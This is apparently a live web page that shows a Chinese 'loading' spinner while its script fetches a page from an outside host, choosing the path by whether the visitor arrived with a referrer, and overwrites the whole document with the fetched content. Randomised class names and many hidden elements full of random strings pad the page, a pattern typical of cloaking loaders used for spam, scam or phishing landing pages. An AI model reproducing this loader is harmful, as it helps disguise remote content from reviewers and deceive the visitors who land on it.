<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .IbtnjnXAWtw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .IbtnjnXAWtw .afTczS {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .IbtnjnXAWtw .content {
            line-height: 50px;
            text-align: center
        }

        .IbtnjnXAWtw .img {
            width: 100%
        }

        .IbtnjnXAWtw .Cj5vjJjMh {
            text-align: center
        }

        .IbtnjnXAWtw .Cj5vjJjMh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .IbtnjnXAWtw .Cj5vjJjMh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .IbtnjnXAWtw .Cj5vjJjMh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .IbtnjnXAWtw .Cj5vjJjMh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .IbtnjnXAWtw .Cj5vjJjMh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .IbtnjnXAWtw .Cj5vjJjMh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .IbtnjnXAWtw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function xTq7PX6qiS(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var J0ooAJH = xTq7PX6qiS('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ J0ooAJH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ J0ooAJH +".html?a=share";
		}
		
        CcLoTv=url+"#"+new Date().getTime();
        CcLoTv && function() {
            $.get(CcLoTv, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<b style='display:none' >u1yF3POGEadFAxqNRfqbDmRv24ilg5ZEVhJa5fh7ba3k0fH0Bq6if4LCadzTocpWjNbR0GUsGzwRQ7n0hJGW</b>
<p  style='display:none'>GInRF9OmGoT3Gw9J3t55iI5r92M3zidjRxvGYMUKCoOhNAS6B</p>
<p  style='display:none'>GInRF9OmGoT3Gw9J3t55iI5r92M3zidjRxvGYMUKCoOhNAS6B</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>nnPXwpeSCTr6YdH9oLTcYQp</a>
<img  src='' style='display:none'>
<b style='display:none' >u1yF3POGEadFAxqNRfqbDmRv24ilg5ZEVhJa5fh7ba3k0fH0Bq6if4LCadzTocpWjNbR0GUsGzwRQ7n0hJGW</b><div class="IbtnjnXAWtw">
    <div class="afTczS">
        <div class="Cj5vjJjMh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >dy2FFamn75bcHoKv31gCBeLl74i4R4djB6NLxLjzRlOB8</li>
<p  style='display:none'>CwWgKetCVcOoIv</p>
<li style='display:none' >dy2FFamn75bcHoKv31gCBeLl74i4R4djB6NLxLjzRlOB8</li>
<h1 style='display:none' >mmFf29d9MIhhdo420LY0VUCaVeSQa4gFBsoqceyefo00u0INWT7Q0exCro</h1>
<div style='display:none'>zdgCDJYolkcqYp51n5GRBKMHuXb0seM9hRm5ud2hm96zXd08i6NINFtuX1SbqqWGMxWsN9LjlM</div>
<ul style='display:none' >ffy0egqcSyNaUm1ejaRsPFIe89fNWLqb73NGKbldU9VSW1</ul>
<ul style='display:none' >ffy0egqcSyNaUm1ejaRsPFIe89fNWLqb73NGKbldU9VSW1</ul>
<h1 style='display:none' >mmFf29d9MIhhdo420LY0VUCaVeSQa4gFBsoqceyefo00u0INWT7Q0exCro</h1></body>
</html>